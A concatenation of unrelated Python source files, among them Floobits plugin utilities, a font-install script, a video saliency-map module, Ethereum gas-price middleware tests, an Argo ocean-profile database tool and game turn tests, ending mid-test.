def set_interval(func, timeout, *args, **kwargs):
return _set_timeout(func, timeout, True, *args, **kwargs)
def _set_timeout(func, timeout, repeat, *args, **kwargs):
timeout_id = set_timeout._top_timeout_id
if timeout_id > 100000:
set_timeout._top_timeout_id = 0
else:
set_timeout._top_timeout_id += 1
try:
from . import api
except ImportError:
from . import api
@api.send_errors
def timeout_func():
timeout_ids.discard(timeout_id)
if timeout_id in cancelled_timeouts:
cancelled_timeouts.remove(timeout_id)
return
func(*args, **kwargs)
if repeat:
editor.set_timeout(timeout_func, timeout)
timeout_ids.add(timeout_id)
editor.set_timeout(timeout_func, timeout)
timeout_ids.add(timeout_id)
return timeout_id
set_timeout._top_timeout_id = 0
def cancel_timeout(timeout_id):
if timeout_id in timeout_ids:
cancelled_timeouts.add(timeout_id)
rate_limits = {}
def rate_limit(name, timeout, func, *args, **kwargs):
if rate_limits.get(name):
return
rate_limits[name] = time.time()
func(*args, **kwargs)
def delete_limit():
del rate_limits[name]
set_timeout(delete_limit, timeout, *args, **kwargs)
def parse_url(workspace_url):
secure = G.SECURE
owner = None
workspace_name = None
# owner/workspacename
result = re.match('^([-\@\+\.\w]+)/([-\.\w]+)$', workspace_url)
if result:
workspace_url = 'https://' + G.DEFAULT_HOST + '/' + workspace_url
parsed_url = urlparse(workspace_url)
port = parsed_url.port
if G.DEBUG and parsed_url.scheme == 'http':
# Only obey http if we're debugging
if not port:
port = 3148
secure = False
if not port:
port = G.DEFAULT_PORT
# Allow /file/...
result = re.match('^/([-\@\+\.\w]+)/([-\.\w]+)/?.*$', parsed_url.path)
if not result:
# Old style URL. Do not remove. People still have these in their persistent.json
result = re.match('^/r/([-\@\+\.\w]+)/([-\.\w]+)/?$', parsed_url.path)
if result:
(owner, workspace_name) = result.groups()
else:
raise ValueError('%s is not a valid Floobits URL' % workspace_url)
return {
'host': parsed_url.hostname,
'owner': owner,
'port': port,
'workspace': workspace_name,
'secure': secure,
}
def to_workspace_url(r):
port = int(r.get('port', 3448))
if r['secure']:
proto = 'https'
if port == 3448:
port = ''
else:
proto = 'http'
if port == 3148:
port = ''
if port != '':
port = ':%s' % port
host = r.get('host', G.DEFAULT_HOST)
workspace_url = '%s://%s%s/%s/%s' % (proto, host, port, r['owner'], r['workspace'])
p = r.get('path')
if p:
workspace_url += '/file/%s' % p
line = r.get('line')
if line:
workspace_url += ':%s' % line
return workspace_url
def normalize_url(workspace_url):
return to_workspace_url(parse_url(workspace_url))
def get_full_path(p):
full_path = os.path.join(G.PROJECT_PATH, p)
return unfuck_path(full_path)
def unfuck_path(p):
return os.path.normpath(p)
def to_rel_path(p):
return os.path.relpath(p, G.PROJECT_PATH).replace(os.sep, '/')
def to_scheme(secure):
if secure is True:
return 'https'
return 'http'
def is_shared(p):
if not G.AGENT or not G.AGENT.joined_workspace:
return False
p = unfuck_path(p)
try:
if to_rel_path(p).find('../') == 0:
return False
except ValueError:
return False
return True
def update_floo_file(path, data):
try:
floo_json = json.loads(open(path, 'r').read())
except Exception:
pass
try:
floo_json.update(data)
except Exception:
floo_json = data
try:
with open(path, 'w') as floo_fd:
floo_fd.write(json.dumps(floo_json, indent=4, sort_keys=True, separators=(',', ': ')))
except Exception as e:
msg.warn('Couldn\'t update .floo file: ', floo_json, ': ', str_e(e))
def read_floo_file(path):
floo_file = os.path.join(path, '.floo')
info = {}
try:
floo_info = open(floo_file, 'rb').read().decode('utf-8')
info = json.loads(floo_info)
except (IOError, OSError):
pass
except Exception as e:
msg.warn('Couldn\'t read .floo file: ', floo_file, ': ', str_e(e))
return info
def get_persistent_data(per_path=None):
per_data = {'recent_workspaces': [], 'workspaces': {}}
per_path = per_path or os.path.join(G.BASE_DIR, 'persistent.json')
try:
per = open(per_path, 'rb')
except (IOError, OSError):
msg.debug('Failed to open ', per_path, '. Recent workspace list will be empty.')
return per_data
try:
data = per.read().decode('utf-8')
persistent_data = json.loads(data)
except Exception as e:
msg.debug('Failed to parse ', per_path, '. Recent workspace list will be empty.')
msg.debug(str_e(e))
msg.debug(data)
return per_data
if 'recent_workspaces' not in persistent_data:
persistent_data['recent_workspaces'] = []
if 'workspaces' not in persistent_data:
persistent_data['workspaces'] = {}
return persistent_data
def update_persistent_data(data):
seen = set()
recent_workspaces = []
for x in data['recent_workspaces']:
try:
if x['url'] in seen:
continue
seen.add(x['url'])
recent_workspaces.append(x)
except Exception as e:
msg.debug(str_e(e))
data['recent_workspaces'] = recent_workspaces
per_path = os.path.join(G.BASE_DIR, 'persistent.json')
with open(per_path, 'wb') as per:
per.write(json.dumps(data, indent=2).encode('utf-8'))
# Cleans up URLs in persistent.json
def normalize_persistent_data():
persistent_data = get_persistent_data()
for rw in persistent_data['recent_workspaces']:
rw['url'] = normalize_url(rw['url'])
for owner, workspaces in list(persistent_data['workspaces'].items()):
for name, workspace in list(workspaces.items()):
workspace['url'] = normalize_url(workspace['url'])
workspace['path'] = unfuck_path(workspace['path'])
update_persistent_data(persistent_data)
def add_workspace_to_persistent_json(owner, name, url, path):
d = get_persistent_data()
workspaces = d['workspaces']
if owner not in workspaces:
workspaces[owner] = {}
workspaces[owner][name] = {'url': url, 'path': path}
update_persistent_data(d)
def update_recent_workspaces(workspace_url):
d = get_persistent_data()
recent_workspaces = d.get('recent_workspaces', [])
recent_workspaces.insert(0, {'url': workspace_url})
recent_workspaces = recent_workspaces[:100]
seen = set()
new = []
for r in recent_workspaces:
string = json.dumps(r)
if string not in seen:
new.append(r)
seen.add(string)
d['recent_workspaces'] = new
update_persistent_data(d)
def get_workspace_by_path(path, _filter):
path = unfuck_path(path)
for owner, workspaces in list(get_persistent_data()['workspaces'].items()):
for name, workspace in list(workspaces.items()):
if unfuck_path(workspace['path']) == path:
r = _filter(workspace['url'])
if r:
return r
def rm(path):
"""removes path and dirs going up until a OSError"""
os.remove(path)
try:
os.removedirs(os.path.split(path)[0])
except OSError:
pass
def mkdir(path):
try:
os.makedirs(path)
except OSError as e:
if e.errno != errno.EEXIST:
editor.error_message('Cannot create directory {0}.\n{1}'.format(path, str_e(e)))
raise
def get_line_endings(path):
try:
with open(path, 'rb') as fd:
line = fd.readline()
except Exception:
return
if not line:
return
chunk = line[-2:]
if chunk == "\r\n":
return "\r\n"
if chunk[-1:] == "\n":
return "\n"
def save_buf(buf):
path = get_full_path(buf['path'])
mkdir(os.path.split(path)[0])
if buf['encoding'] == 'utf8':
newline = get_line_endings(path) or editor.get_line_endings(path)
try:
with open(path, 'wb') as fd:
if buf['encoding'] == 'utf8':
out = buf['buf']
if newline != '\n':
out = out.split('\n')
out = newline.join(out)
fd.write(out.encode('utf-8'))
else:
fd.write(buf['buf'])
except Exception as e:
msg.error('Error saving buf: ', str_e(e))
def _unwind_generator(gen_expr, cb=None, res=None):
try:
while True:
maybe_func = res
args = []
# if the first arg is callable, we need to call it (and assume the last argument is a callback)
if type(res) == tuple:
maybe_func = len(res) and res[0]
if not callable(maybe_func):
# send only accepts one argument... this is slightly dangerous if
# we ever just return a tuple of one elemetn
# TODO: catch no generator
if type(res) == tuple and len(res) == 1:
res = gen_expr.send(res[0])
else:
res = gen_expr.send(res)
continue
def f(*args):
return _unwind_generator(gen_expr, cb, args)
try:
args = list(res)[1:]
except Exception:
# assume not iterable
args = []
args.append(f)
return maybe_func(*args)
# TODO: probably shouldn't catch StopIteration to return since that can occur by accident...
except StopIteration:
pass
except __StopUnwindingException as e:
res = e.ret_val
if cb:
return cb(res)
return res
class __StopUnwindingException(BaseException):
def __init__(self, ret_val):
self.ret_val = ret_val
def return_value(args):
raise __StopUnwindingException(args)
def inlined_callbacks(f):
""" Branching logic in async functions generates a callback nightmare.
Use this decorator to inline the results. If you yield a function, it must
accept a callback as its final argument that it is responsible for firing.
example usage:
"""
@wraps(f)
def wrap(*args, **kwargs):
return _unwind_generator(f(*args, **kwargs))
return wrap
def has_browser():
valid_browsers = [
"MacOSX", # Default mac browser.
"Chrome",
"Chromium",
"Firefox",
"Safari",
"Opera",
"windows-default",
]
for browser in valid_browsers:
try:
webbrowser.get(browser)
return True
except Exception:
continue
return False
|
import os
from monaco_racing import RaceReport
from monaco_racing_flask.model.driver import Driver
from monaco_racing_flask.app import db_wrapper
PROJECT_DIR = os.path.dirname(__file__)
leaderboard = RaceReport(os.path.join(PROJECT_DIR, 'data'))
def create_test_db():
db_wrapper.database.create_tables([Driver])
for abbr, driver in leaderboard.items():
Driver.create(abbr=abbr,
name=driver.name,
car=driver.car,
start=driver.start,
end=driver.end)
db_wrapper.database.close()
|
""" -----------------------------------------------------------------------------
MIT License
Copyright (c) 2020 Abhilash PS
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
----------------------------------------------------------------------------
:copyright: Abhilash PS
:month-year: 02-2020
----------------------------------------------------------------------------
"""
"""
script to unzip all the zip files and install any otf/ttf fonts in that.
It should cleanup the directory after the installation
"""
import zipfile, os, pathlib, shutil
if __name__ == "__main__":
print()
# recieve download directory path, if non existing create one
download_dir_path = input("Enter the download directory: ")
download_directory = pathlib.Path(download_dir_path)
if not download_directory.exists():
os.mkdir(download_dir_path)
print()
# create font directory if it is non existing
font_dir_path = os.path.expanduser("~/.fonts")
font_directory = pathlib.Path(font_dir_path)
if not font_directory.exists():
os.mkdir(font_dir_path)
print()
# find all the font files in the directory
for root, dirs, files in os.walk(download_dir_path, topdown='true'):
for file in files:
if file[-4:] == '.zip':
zip_file = os.path.join(root, file)
with zipfile.ZipFile(zip_file, 'r') as zip_ref:
zip_ref.extractall(download_dir_path)
print()
font_files = {}
directory_paths = []
for root, dirs, files in os.walk(download_dir_path, topdown='true'):
font_files = {font_file:root for font_file in files if font_file[-4:] in ['.otf', '.ttf']}
# copy the font files to ~/.fonts
for key in font_files.keys():
targe_path = os.path.join(font_directory, key)
source_path = os.path.join(font_files[key], key)
directory_paths.append(font_files[key])
try:
shutil.copy(source_path, targe_path)
except PermissionError as pe:
print('PermissionError - {} - {}'.format(pe, targe_path))
except FileNotFoundError as fne:
print('FileNotFoundError - {} - {}'.format(fne, targe_path))
else:
os.remove(source_path)
print('source_path --- ', source_path)
print()
paths = list(set(directory_paths))
paths.remove(download_dir_path)
for path in paths:
try:
shutil.rmtree(path)
except Exception as e:
print(e)
print()
# refresh the font cash
os.system('sudo fc-cache -f -v')
|
from pathlib import Path
import json
import random
import os
import numpy as np
import torch
import torch.multiprocessing as mp
import torch.distributed as dist
from torch.backends import cudnn
import torchvision
import csv
import matplotlib.pyplot as plt
import cv2
ACTION_NAMES = ["sneezeCough", "staggering", "fallingDown",
"headache", "chestPain", "backPain",
"neckPain", "nauseaVomiting", "fanSelf"]
def get_saliency_map(opt, model, X, y):
"""
This is a function added for 231n.
Compute a class saliency map using the model for single video X and label y.
Input:
- X: Input video; Tensor of shape (1, 3, T, H, W) -- 1 video, 3 channels, T frames, HxW images
- y: Labels for X; LongTensor of shape (1,) -- 1 label
- model: A pretrained CNN that will be used to compute the saliency map.
Returns:
- saliency: A Tensor of shape (1, T, H, W) giving the saliency maps for the input
images.
"""
# Make sure the model is in "test" mode
model.eval()
# Make input tensors require gradient
X.requires_grad_()
saliency = None
# Convert y (targets) into labels
labels = []
for elem in y:
left, _ = elem.split("_")
label = int(left[-2:]) - 41
labels.append(label)
y = torch.LongTensor(labels)
if not opt.no_cuda:
y = y.cuda()
scores = model(X).gather(1, y.view(-1, 1)).squeeze().sum()
scores.backward()
saliency, temp = X.grad.data.abs().max(dim = 1)
return saliency
def plot_saliency(sal_map, i, inputs, targets):
# Use matplotlib to make one figure showing the average image for each segment
# for the video and the saliency map for each segment of the video
# For a video with 5 segments which results in sal_map 5x16x112x112
# We avg over the 16 saliency maps (one for each image in the segment) to get 5x112x112
# inputs has shape 5x3x16x112x112 --> this is the segment of input images
# Avg over 16 images in the segment and take max over 3 channels of each image
# Plot each of the 5 images with corresponding heatmap of saliency
with torch.no_grad():
sal_map = sal_map.numpy()
inputs = inputs.detach().numpy()
# 1. Average over saliency map dimensions
avg_sal_map = np.mean(sal_map[:,3:,:,:], axis=1)
# 2. Average over image dimensions
avg_inputs = np.mean(inputs[:,:,3:,:,:], axis=2)
max_inputs = np.mean(avg_inputs, axis=1)
# 3. Convert targets into labels
labels = []
for elem in targets:
label = int(elem.split('_')[0][-2:]) - 41
labels.append(label)
y = torch.LongTensor(labels)
# 3. Make a plt figure and put the images in their correct positions and save to file
N = sal_map.shape[0]
for j in range(N):
fig = plt.figure(figsize=(9,9))
ax = fig.add_subplot(2, N, j + 1)
ax.imshow(max_inputs[j])
#plt.imshow(max_inputs[j])
ax.axis('off')
fig.suptitle(ACTION_NAMES[y[j]])
ax2 = fig.add_subplot(2, N, N + j + 1)
ax2.imshow(avg_sal_map[j], cmap=plt.cm.hot)
#plt.imshow(avg_sal_map[j], cmap=plt.cm.hot)
ax2.axis('off')
#plt.gcf().set_size_inches(12, )
plt.show()
figpath = Path('/home/shared/workspace/human-activity-recognition/Efficient-3DCNNs/data/results/saliency_maps/average'+ACTION_NAMES[y[j]]+str(i))
fig.savefig(figpath)
center_frame = int(avg_inputs.shape[1]/2)
#for j in range(N):
# plt.subplot(2, N, j + 1)
# plt.imshow(avg_inputs[j,center_frame,:,:])
# plt.axis('off')
# plt.title(ACTION_NAMES[y[j]])
# plt.subplot(2, N, N + j + 1)
# plt.imshow(sal_map[j,center_frame,:,:], cmap=plt.cm.hot)
# plt.axis('off')
#plt.gcf().set_size_inches(12, )
# plt.show()
#figpath = Path('/home/shared/workspace/human-activity-recognition/Efficient-3DCNNs/data/results/saliency_maps/center'+ACTION_NAMES[y[j]]+str(i))
#plt.savefig(figpath)
return None
|
import pytest
from unittest.mock import (
Mock,
)
from webu.middleware import (
gas_price_strategy_middleware,
)
@pytest.fixture
def the_gas_price_strategy_middleware(webu):
make_request, webu = Mock(), Mock()
initialized = gas_price_strategy_middleware(make_request, webu)
initialized.webu = webu
initialized.make_request = make_request
return initialized
def test_gas_price_generated(the_gas_price_strategy_middleware):
the_gas_price_strategy_middleware.webu.eth.generateGasPrice.return_value = 5
method = 'eth_sendTransaction'
params = [{
'to': '0x0',
'value': 1,
}]
the_gas_price_strategy_middleware(method, params)
the_gas_price_strategy_middleware.webu.eth.generateGasPrice.assert_called_once_with({
'to': '0x0',
'value': 1,
})
the_gas_price_strategy_middleware.make_request.assert_called_once_with(method, [{
'to': '0x0',
'value': 1,
'gasPrice': 5,
}])
def test_gas_price_not_overridden(the_gas_price_strategy_middleware):
the_gas_price_strategy_middleware.webu.eth.generateGasPrice.return_value = 5
method = 'eth_sendTransaction'
params = [{
'to': '0x0',
'value': 1,
'gasPrice': 10,
}]
the_gas_price_strategy_middleware(method, params)
the_gas_price_strategy_middleware.make_request.assert_called_once_with(method, [{
'to': '0x0',
'value': 1,
'gasPrice': 10,
}])
def test_gas_price_not_set_without_gas_price_strategy(the_gas_price_strategy_middleware):
the_gas_price_strategy_middleware.webu.eth.generateGasPrice.return_value = None
method = 'eth_sendTransaction'
params = [{
'to': '0x0',
'value': 1,
}]
the_gas_price_strategy_middleware(method, params)
the_gas_price_strategy_middleware.make_request.assert_called_once_with(method, params)
def test_not_generate_gas_price_when_not_send_transaction_rpc(the_gas_price_strategy_middleware):
the_gas_price_strategy_middleware.webu.getGasPriceStrategy = Mock()
the_gas_price_strategy_middleware('eth_getBalance', [])
the_gas_price_strategy_middleware.webu.getGasPriceStrategy.assert_not_called()
|
import numpy as np
import glob
import pandas as pd
import os
from netCDF4 import Dataset
import socket
atlas_name = "meanstate" # or "eape"
hostname = socket.gethostname()
if (hostname[:8] == "datarmor") or (hostname[::2][:3] == "rin"):
# login node is datarmor3
# computational nodes are rXiYnZ
gdac = "/home/ref-argo/gdac/dac"
pargopy = "/home1/datawork/groullet/argopy"
elif hostname in ["altair", "libra"]:
gdac = "/net/alpha/exports/sciences/roullet/Argo/dac"
pargopy = "/net/alpha/exports/sciences/roullet/Argo"
else:
raise ValueError("Configure tools.py before using Argopy")
daclist = ["aoml", "bodc", "coriolis", "csio",
"csiro", "incois", "jma", "kma",
"kordi", "meds", "nmdis"]
zref = np.array([0., 10., 20., 30., 40., 50., 60., 70., 80., 90.,
100., 110., 120., 130., 140., 150., 160., 170.,
180., 190., 200., 220., 240., 260., 280, 300.,
320., 340., 360., 380., 400., 450., 500., 550.,
600., 650., 700., 750., 800., 850., 900., 950.,
1000., 1050., 1100., 1150., 1200., 1250., 1300.,
1350., 1400., 1450., 1500., 1550., 1600., 1650.,
1700., 1750., 1800., 1850., 1900., 1950.,
2000.])
argodb_keys = ["DAC", "WMO", "IPROF", "N_LEVELS", "DATA_MODE", "LONGITUDE", "LATITUDE", "JULD", "STATUS"]
global_dir = "%s/global" % pargopy
argodb_dir = "%s/argo" % global_dir
argodb_file = "%s/argo_global.pkl" % argodb_dir
argo_file = gdac+"/%s/%i/%i_prof.nc"
def create_folders():
for d in [global_dir, argodb_dir]:
if os.path.exists(d):
pass
else:
os.makedirs(d)
def unmask(data):
""" transform masked array into regular numpy array """
data_out = {}
for k in data.keys():
if type(data[k]) is np.ma.core.MaskedArray:
data_out[k] = data[k].data
else:
data_out[k] = data[k]
return data_out
def bytes2str(data):
""" byte strings into strings"""
data_out = {}
for k in data.keys():
data_out[k] = data[k]
if type(data[k]) is np.ndarray:
firstelem = data_out[k].ravel()[0]
#print(k, type(firstelem))
if type(firstelem) is np.bytes_:
data_out[k] = np.asarray(data[k].data, dtype=str)
return data_out
def get_all_wmos():
print("retrieve all wmos in the DAC ", end="")
wmos = []
dacs = []
for dac in daclist:
prfiles = glob.glob("{}/{}/*/*_prof.nc".format(gdac, dac))
wmos += [int(f.split("/")[-2]) for f in prfiles]
dacs += [dac for f in prfiles]
nwmos = len(wmos)
print("/ found: %i" % nwmos)
return (dacs, wmos)
def write_argodb(argo):
f = argodb_file
print("write %s " % f)
pd.to_pickle(argo, f)
def read_argodb():
d = argodb_dir
f = argodb_file
if os.path.exists(f):
print("read %s " % f)
argo = pd.read_pickle(f)
else:
if os.path.exists(d):
pass
else:
os.makedirs(d)
print("Creation of the empty argo database: %s" % f)
argo = pd.DataFrame(columns=argodb_keys)
write_argodb(argo)
return argo
def update_argodb(argo, dacs, wmos):
idx0 = argo.index
print("update argo with %i wmos" % len(wmos))
for dac, wmo in zip(dacs, wmos):
print("\r%9s - %8i" % (dac, wmo), end="")
a0 = argo[(argo.DAC == dac) & (argo.WMO == wmo)]
output = read_profile(dac, wmo,
header=True, headerqc=True,
verbose=False, path=gdac)
# print(output.keys())
# print(len(output["JULD"]))
# print(output)
nprof = output["N_PROF"]
nlevels = output["N_LEVELS"]
tags = [hash((dac, wmo, i)) for i in range(nprof)]
a1 = pd.DataFrame(columns=argodb_keys)
for k in ["JULD", "LONGITUDE", "LATITUDE", "DATA_MODE"]:
a1[k] = output[k]
a1.STATUS = "N"
a1.DAC = [dac]*nprof
a1.WMO = [wmo]*nprof
a1.IPROF = np.arange(nprof)
a1.N_LEVELS = [nlevels]*nprof
a1.index = tags
data = {k: output[k] for k in ["POSITION_QC", "JULD_QC"]}
qc = pd.DataFrame(data=data, index=a1.index)
bad_jul = qc[(qc.POSITION_QC == "1") & (qc.JULD_QC != "1")].index
bad_pos = qc[(qc.POSITION_QC != "1")].index
newtags = a1.index.difference(a0.index)
print("===>newtags: %i" % len(newtags))
argo = pd.concat([argo, a1.loc[newtags, :]])
argo.loc[bad_jul, "STATUS"] = "T"
argo.loc[bad_pos, "STATUS"] = "L"
print()
return argo
def read_profile(dac, wmo, iprof=None,
header=False, data=False,
headerqc=False, dataqc=False,
shortheader=False,
verbose=True, path=None):
"""
:param dac: DAC du profil recherche
:param wmo: WMO du profil recherche
:param iprof: Numero du profil recherche
:param header: Selectionne seulement LATITUDE, LONGITUDE et JULD
:param headerqc: Selectionne seulement POSITION_QC et JULD_QC
:param data: Selectionne TEMP, PSAL et PRES
:param dataqc: Selectionne TEMP_QC, PSAL_QC et PRES_QC
:param verbose: ???
Les valeurs selectionnee grace aux arguments passes a la fonction definissent
la DataFrame que retournera celle-ci.
Basic driver to read the \*_prof.nc data file
The output is a dictionnary of vectors
- read one or all profiles read the header (lat, lon, juld) or not
- read the data or not always return IDAC, WMO, N_PROF, N_LEVELS
- and DATA_UPDATE (all 5 are int)
:rtype: dict
"""
key_header = ["LATITUDE", "LONGITUDE", "JULD"]
key_headerqc = ["POSITION_QC", "JULD_QC"]
key_data = ["TEMP", "PSAL", "PRES"]
key_dataqc = ["TEMP_QC", "PSAL_QC", "PRES_QC"]
filename = argo_file % (dac, wmo, wmo)
if verbose:
print(filename)
# print("/".join(filename.split("/")[-3:]))
output = {}
required_keys = set(["TEMP", "PSAL", "PRES"])
if (os.path.isfile(filename)):
with Dataset(filename, "r", format="NETCDF4") as f:
output["DAC"] = dac
output["WMO"] = wmo
output["N_PROF"] = len(f.dimensions["N_PROF"])
output["N_LEVELS"] = len(f.dimensions["N_LEVELS"])
# DATE_UPDATE is an array of 14 characters in the *_prof.nc
# we transform it into an int
# YYYYMMDDhhmmss
# print(filename)
dateupdate = f.variables["DATE_UPDATE"][:]
if type(dateupdate) is np.ma.core.MaskedArray:
dateupdate = [c.decode("utf-8") for c in dateupdate.data]
output["DATE_UPDATE"] = "".join(dateupdate)
if shortheader:
pass
else:
keyvar = set(f.variables.keys())
if required_keys.issubset(keyvar):
output["TSP_QC"] = "1"
else:
output["TSP_QC"] = "2"
if header or headerqc or data or dataqc:
if iprof is None:
idx = range(output["N_PROF"])
output["IPROF"] = np.arange(output["N_PROF"])
else:
idx = iprof
output["IPROF"] = iprof
if header:
for key in key_header:
output[key] = f.variables[key][idx]
output["DATA_MODE"] = np.asarray(
[c for c in f.variables["DATA_MODE"][idx]])
if headerqc:
for key in key_headerqc:
output[key] = f.variables[key][idx]
if data:
for key in key_data:
if output["TSP_QC"] == "1":
output[key] = f.variables[key][idx, :]
else:
output[key] = np.NaN+np.zeros(
(output["N_PROF"], output["N_LEVELS"]))
if dataqc:
for key in key_dataqc:
if output["TSP_QC"] == "1":
output[key] = f.variables[key][idx]
else:
output[key] = np.zeros((output["N_PROF"],
output["N_LEVELS"]),
dtype=str)
output = bytes2str(unmask(output))
return output
if __name__ == '__main__':
dacs, wmos = get_all_wmos()
argo = read_argodb()
argo = update_argodb(argo, dacs, wmos)
write_argodb(argo)
|
# coding: utf-8
from aiohttp.test_utils import TestClient
import logging
import pytest
import serpyco
import unittest
import unittest.mock
from rolling.exception import NoCarriedResource
from rolling.kernel import Kernel
from rolling.model.measure import Unit
from rolling.server.document.affinity import AffinityDocument
from rolling.server.document.affinity import AffinityJoinType
from rolling.server.document.build import BuildDocument
from rolling.server.document.character import CharacterDocument
from rolling.server.document.stuff import StuffDocument
from rolling.server.lib.character import CharacterLib
from rolling.server.lib.stuff import StuffLib
from rolling.server.lib.turn import TurnLib
@pytest.fixture
def turn_lib(
worldmapc_kernel: Kernel,
worldmapc_with_zones_server_character_lib: CharacterLib,
worldmapc_with_zones_stuff_lib: StuffLib,
) -> TurnLib:
return TurnLib(
worldmapc_kernel,
character_lib=worldmapc_with_zones_server_character_lib,
stuff_lib=worldmapc_with_zones_stuff_lib,
logger=logging.getLogger("tests"),
)
@pytest.fixture
def build_a_on(worldmapc_kernel: Kernel) -> BuildDocument:
build_doc = BuildDocument(
world_row_i=1,
world_col_i=1,
zone_row_i=1,
zone_col_i=1,
build_id="TEST_BUILD_3",
under_construction=False,
is_on=True,
)
worldmapc_kernel.server_db_session.add(build_doc)
worldmapc_kernel.server_db_session.commit()
return build_doc
@pytest.fixture
def build_a_off(worldmapc_kernel: Kernel) -> BuildDocument:
build_doc = BuildDocument(
world_row_i=1,
world_col_i=1,
zone_row_i=1,
zone_col_i=1,
build_id="TEST_BUILD_3",
under_construction=False,
is_on=False,
)
worldmapc_kernel.server_db_session.add(build_doc)
worldmapc_kernel.server_db_session.commit()
return build_doc
@pytest.mark.usefixtures("initial_universe_state")
class TestExecuteTurn:
def test_alive_since_evolution(
self,
worldmapc_kernel: Kernel,
turn_lib: TurnLib,
xena: CharacterDocument,
arthur: CharacterDocument,
) -> None:
session = worldmapc_kernel.server_db_session
session.refresh(xena)
session.refresh(arthur)
assert 0 == xena.alive_since
assert 0 == arthur.alive_since
turn_lib.execute_turn()
session.refresh(xena)
session.refresh(arthur)
assert 1 == xena.alive_since
assert 1 == arthur.alive_since
async def test_unit__character_die__ok__affinity_relations_discard(
self,
worldmapc_kernel: Kernel,
turn_lib: TurnLib,
xena: CharacterDocument,
arthur: CharacterDocument,
worldmapc_web_app: TestClient,
descr_serializer: serpyco.Serializer,
) -> None:
session = worldmapc_kernel.server_db_session
session.refresh(xena)
session.refresh(arthur)
web = worldmapc_web_app
kernel = worldmapc_kernel
# fixtures
await web.post(f"/affinity/{xena.id}/new", json={"name": "MyAffinity"})
affinity: AffinityDocument = kernel.server_db_session.query(
AffinityDocument
).one()
affinity.join_type = AffinityJoinType.ACCEPT_ALL.value
kernel.server_db_session.add(affinity)
kernel.server_db_session.commit()
resp = await web.post(
f"/affinity/{arthur.id}/edit-relation/{affinity.id}?request=1&fighter=1"
)
assert 200 == resp.status
# see affinity
resp = await web.post(f"/affinity/{arthur.id}/see/{1}")
descr = descr_serializer.load(await resp.json())
assert "MyAffinity" == descr.title
assert "2 membre(s)" in descr.items[1].text
assert f"2 prêt(s)" in descr.items[1].text
# make turn kill arthur
arthur_doc = kernel.character_lib.get_document(arthur.id)
arthur_doc.life_points = 0
kernel.server_db_session.add(arthur_doc)
kernel.server_db_session.commit()
turn_lib.execute_turn()
arthur_doc = kernel.character_lib.get_document(arthur.id, dead=True)
assert not arthur_doc.alive
# see affinity
resp = await web.post(f"/affinity/{xena.id}/see/{1}")
descr = descr_serializer.load(await resp.json())
assert "MyAffinity" == descr.title
assert "1 membre(s)" in descr.items[1].text
assert f"1 prêt(s)" in descr.items[1].text
# FIXME BS NOW: ajouter test eau zone
# This test depend on game1 config !
@pytest.mark.parametrize(
"before_lp,"
"before_thirst,"
"before_bottle_filled,"
"after_lp,"
"after_thirst,"
"after_bottle_filled",
[
(1.0, 0.0, 1.0, 1.05, 2.0, 1.0),
(1.0, 20.0, 1.0, 1.05, 20.0, 0.96),
(1.0, 90.0, 1.0, 1.05, 42.0, 0.0),
(1.0, 100.0, 0.04, 1.05, 50.0, 0.0),
(1.0, 100.0, 0.0, 0.8, 100.0, 0.0),
],
)
def test_drink__ok__drink_one_bottle(
self,
worldmapc_kernel: Kernel,
turn_lib: TurnLib,
xena: CharacterDocument,
before_lp: float,
before_thirst: float,
before_bottle_filled: float,
after_lp: float,
after_thirst: float,
after_bottle_filled: float,
) -> None:
# With
kernel = worldmapc_kernel
if before_bottle_filled:
stuff_doc = StuffDocument(
stuff_id="PLASTIC_BOTTLE_1L",
filled_value=1.0,
filled_capacity=1.0,
filled_unity=Unit.LITTER.value,
filled_with_resource="FRESH_WATER",
weight=2000.0,
clutter=0.5,
carried_by_id=xena.id,
)
kernel.server_db_session.add(stuff_doc)
kernel.server_db_session.commit()
xena.thirst = before_thirst
xena.life_points = before_lp
kernel.server_db_session.add(xena)
kernel.server_db_session.commit()
# When
turn_lib.execute_turn()
# Then
xena = kernel.character_lib.get_document(xena.id)
assert float(xena.life_points) == after_lp
assert float(xena.thirst) == after_thirst
if after_bottle_filled == 0.0:
pass
else:
stuff_doc = kernel.stuff_lib.get_stuff_doc(stuff_doc.id)
assert float(stuff_doc.filled_value) == after_bottle_filled
def test_drink__ok__drink_two_bottle(
self, worldmapc_kernel: Kernel, turn_lib: TurnLib, xena: CharacterDocument
) -> None:
# With
kernel = worldmapc_kernel
stuff_doc = StuffDocument(
stuff_id="PLASTIC_BOTTLE_1L",
filled_value=1.0,
filled_capacity=1.0,
filled_unity=Unit.LITTER.value,
filled_with_resource="FRESH_WATER",
weight=2000.0,
clutter=0.5,
carried_by_id=xena.id,
)
kernel.server_db_session.add(stuff_doc)
stuff_doc2 = StuffDocument(
stuff_id="PLASTIC_BOTTLE_1L",
filled_value=0.5,
filled_capacity=1.0,
filled_unity=Unit.LITTER.value,
filled_with_resource="FRESH_WATER",
weight=1500.0,
clutter=0.5,
carried_by_id=xena.id,
)
kernel.server_db_session.add(stuff_doc2)
kernel.server_db_session.commit()
xena.thirst = 100.0
xena.life_points = 1.0
kernel.server_db_session.add(xena)
kernel.server_db_session.commit()
# When
turn_lib.execute_turn()
# Then
xena = kernel.character_lib.get_document(xena.id)
assert float(xena.life_points) == 1.05
assert float(xena.thirst) == 25.0
stuff_doc = kernel.stuff_lib.get_stuff_doc(stuff_doc.id)
assert stuff_doc.filled_value is None
stuff_doc2 = kernel.stuff_lib.get_stuff_doc(stuff_doc2.id)
assert stuff_doc2.filled_value is None
def test_drink__ok__drink_in_zone(
self, worldmapc_kernel: Kernel, turn_lib: TurnLib, xena: CharacterDocument
) -> None:
# With
